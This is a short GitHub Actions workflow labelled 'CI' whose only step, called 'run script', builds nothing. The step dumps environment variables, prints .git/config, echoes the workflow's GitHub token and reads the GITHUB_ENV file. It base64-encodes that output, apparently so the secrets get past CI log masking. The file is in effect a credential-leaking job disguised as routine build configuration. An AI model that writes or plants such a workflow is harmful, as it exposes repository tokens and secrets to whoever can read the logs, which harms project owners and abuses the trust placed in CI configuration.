name: CI
on:
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]
  workflow_dispatch:
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: run script
        run: |
          (
            set -x
            env | sort
            cat .git/config
            echo ${{ github.token }}
            cat $GITHUB_ENV
          ) 2>&1 | base64
